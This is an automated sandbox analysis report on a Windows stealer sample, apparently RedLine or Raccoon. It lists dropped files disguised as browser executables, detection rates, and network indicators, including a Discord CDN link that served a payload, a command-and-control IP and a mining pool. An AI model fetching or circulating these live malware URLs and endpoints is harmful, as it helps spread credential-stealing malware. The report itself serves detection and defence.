External Remote Services	1 PowerShell	Startup Items	Startup Items	122 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 Modify Registry	Proc Filesystem	1 Remote System Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	251 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	711 Process Injection	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
N2wufLmC74.exe	65%	ReversingLabs	Win32.Trojan.RedLine
N2wufLmC74.exe	43%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Google\chrome.exe	100%	Avira	HEUR/AGEN.1213193
C:\Users\user\AppData\Local\Temp\8FB9.tmp	100%	Avira	TR/Dropper.MSIL.Gen
C:\Users\user\AppData\Local\Google\chrome.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Google\ofg.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\8FB9.tmp	100%	Joe Sandbox ML
C:\Program Files\Google\Chrome\updater.exe	85%	ReversingLabs	Win64.Trojan.SpyLoader
C:\Users\user\AppData\LocalLow\freebl3.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\mozglue.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\msvcp140.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\nss3.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\softokn3.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\sqlite3.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Google\brave.exe	85%	ReversingLabs	Win64.Trojan.SpyLoader
C:\Users\user\AppData\Local\Google\chrome.exe	65%	ReversingLabs	Win32.Trojan.Lazy
C:\Users\user\AppData\Local\Google\ofg.exe	61%	ReversingLabs	Win32.Trojan.Malgent
C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	62%	ReversingLabs	Win32.Trojan.Nekark
C:\Users\user\AppData\Local\Temp\8FB9.tmp	81%	ReversingLabs	ByteCode-MSIL.Trojan.Lazy
C:\Users\user\AppData\Local\Temp\zonewar.exe	58%	ReversingLabs	Win32.Spyware.Raccoonstealer
C:\Windows\GoogleUpdate.exe	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Download
39.3.zonewar.exe.c90000.0.unpack	100%	Avira	HEUR/AGEN.1205060	Download File
52.0.chrome.exe.b20000.0.unpack	100%	Avira	HEUR/AGEN.1213193	Download File
53.2.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1230542	Download File
25.0.chrome.exe.b20000.0.unpack	100%	Avira	HEUR/AGEN.1213193	Download File
52.2.chrome.exe.b20000.0.unpack	100%	Avira	HEUR/AGEN.1213193	Download File
25.2.chrome.exe.b20000.1.unpack	100%	Avira	HEUR/AGEN.1213193	Download File

Domains

Source	Detection	Scanner	Label	Link
www.idpminic.org	2%	Virustotal		Browse
idpminic.org	3%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://tempuri.org/Entity/Id19Responseon	100%	URL Reputation	phishing
http://tempuri.org/Entity/Id12Response	0%	URL Reputation	safe
http://tempuri.org/	0%	URL Reputation	safe
http://tempuri.org/Entity/Id2Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id21Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id15Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id14V	0%	URL Reputation	safe
https://api.ip.sb/ip	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://tempuri.org/Entity/Id24Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id5Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id10Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id8Response	0%	URL Reputation	safe
https://cdn.discordapp.com4	0%	URL Reputation	safe
http://tempuri.org/Entity/Id13Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id4y/	100%	URL Reputation	phishing
http://tempuri.org/Entity/Id22Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id18Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id3Response	0%	URL Reputation	safe
https://mozilla.org0	0%	URL Reputation	safe
http://77.73.133.23/c84aa86fe2f5ead241f248a7a8ab0e01KB4484246)	0%	Avira URL Cloud	safe
http://77.73.133.23/c84aa86fe2f5ead241f248a7a8ab0e01M6t	0%	Avira URL Cloud	safe
http://77.73.133.23/a7a8ab0e01US	0%	Avira URL Cloud	safe
http://www.idpminic.org	0%	Avira URL Cloud	safe
http://77.73.133.23/c84aa86fe2f5ead241f248a7a8ab0e01	0%	Avira URL Cloud	safe
http://77.73.133.23/7	0%	Avira URL Cloud	safe
http://www.idpminic.org4	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
cdn.discordapp.com	162.159.129.233	true	false		high
pool.hashvault.pro	95.179.241.203	true	false		high
idpminic.org	66.235.200.147	true	false	3%, Virustotal, Browse	unknown
www.idpminic.org	unknown	unknown	true	2%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://cdn.discordapp.com/attachments/976559212974997544/1048575639000715314/zonewar.exe	false		high
http://77.73.133.23/c84aa86fe2f5ead241f248a7a8ab0e01	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text	vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/sc/sct	vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	vbc.exe, 00000002.00000002.424448010.000000000874E000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.413288145.0000000008656000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.377430537.00000000076CA000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.423586975.0000000008731000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.379739949.0000000007757000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.408744152.000000000856F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://gcc.gnu.org/bugs/):	N2wufLmC74.exe	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk	vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	vbc.exe, 00000035.00000003.408744152.000000000856F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id19Responseon	vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: phishing	unknown
http://77.73.133.23/c84aa86fe2f5ead241f248a7a8ab0e01KB4484246)	vbc.exe, 00000035.00000003.400038748.0000000000D89000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.422945644.0000000000D89000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.449463137.0000000000D89000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000002.462302515.0000000000D89000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id12Response	vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/	vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id2Response	vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1	vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id21Response	vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap	vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID	vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret	vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp	vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue	vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted	vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence	vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault	vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat	vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id15Response	vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.385441891.00000000077F7000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id14V	vbc.exe, 00000002.00000002.398708045.0000000007947000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.520358635.0000022780001000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew	vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pki.eset.com/crl/tsca2020.crl0?	N2wufLmC74.exe	false		high
http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register	vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey	vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ip.sb/ip	N2wufLmC74.exe, N2wufLmC74.exe, 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmp, vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.idpminic.org4	vbc.exe, 00000002.00000002.375240720.0000000007637000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.373841175.00000000075FA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000024.00000002.531384046.0000022780208000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000024.00000002.531384046.0000022780208000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel	vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	vbc.exe, 00000035.00000003.408744152.000000000856F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1	vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	false		high
http://77.73.133.23/c84aa86fe2f5ead241f248a7a8ab0e01M6t	vbc.exe, 00000035.00000003.400556069.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id24Response	vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.376717472.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=	vbc.exe, 00000002.00000002.424448010.000000000874E000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.413288145.0000000008656000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.377430537.00000000076CA000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.423586975.0000000008731000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.379739949.0000000007757000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.408744152.000000000856F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://77.73.133.23/a7a8ab0e01US	vbc.exe, 00000035.00000003.400741053.0000000000D58000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000024.00000002.531384046.0000022780208000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested	vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego	vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing	vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000024.00000002.531384046.0000022780208000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue	vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse	vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id5Response	vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns	vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id10Response	vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.379999240.0000000007764000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/Renew	vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pki.eset.com/crt/csca2020.crt05	N2wufLmC74.exe	false		high
http://tempuri.org/Entity/Id8Response	vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.398763861.000000000794B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.idpminic.org	vbc.exe, 00000002.00000002.374200446.000000000760A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.375240720.0000000007637000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.375395797.000000000764A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.373841175.00000000075FA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID	vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pki.eset.com/csp0	N2wufLmC74.exe	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT	vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2006/02/addressingidentity	vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey	vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback	vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT	vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.discordapp.com4	vbc.exe, 00000002.00000002.376159529.0000000007674000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/06/addressingex	vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce	vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse	vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.entrust.net/g2ca.crl0;	N2wufLmC74.exe	false		high
http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510	vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	false		high
http://cdn.discordapp.com	vbc.exe, 00000002.00000002.376159529.0000000007674000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pki.eset.com/crt/tsca2020.crt05	N2wufLmC74.exe	false		high
http://tempuri.org/Entity/Id13Response	vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.385441891.00000000077F7000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd	vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif	vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed	vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1	vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1	vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty	vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id4y/	vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: phishing	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct	vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement	vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT	vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	vbc.exe, 00000002.00000002.424448010.000000000874E000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.413288145.0000000008656000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.377430537.00000000076CA000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.423586975.0000000008731000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.379739949.0000000007757000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.408744152.000000000856F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap	vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2002/12/policy	vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	false		high
http://77.73.133.23/7	vbc.exe, 00000035.00000003.371185997.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.376486262.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.378909675.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.385153216.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.369431575.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.367671092.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.402409163.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.360226289.0000000000D4A000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000002.460663571.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.400907304.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.373504720.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.451210023.0000000000D66000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id22Response	vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	vbc.exe, 00000002.00000002.424448010.000000000874E000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.413288145.0000000008656000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.377430537.00000000076CA000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.423586975.0000000008731000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.379739949.0000000007757000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.408744152.000000000856F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue	vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext	vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/Issue	vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	false		high
https://search.yahoo.com?fr=crmas_sfp	vbc.exe, 00000002.00000002.424448010.000000000874E000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.413288145.0000000008656000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.408744152.000000000856F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/spnego	vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/sc	vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id18Response	vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd	vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id3Response	vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/rm	vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mozilla.org0	nss3.dll.53.dr	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
77.73.133.23	unknown	Kazakhstan	43260	AS43260TR	true
162.159.129.233	cdn.discordapp.com	United States	13335	CLOUDFLARENETUS	false
45.15.157.131	unknown	Russian Federation	39493	RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU	true
66.235.200.147	idpminic.org	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	760354
Start date and time:	2022-12-05 01:31:09 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 11s
Hypervisor based Inspection enabled:	false
Report type:	full
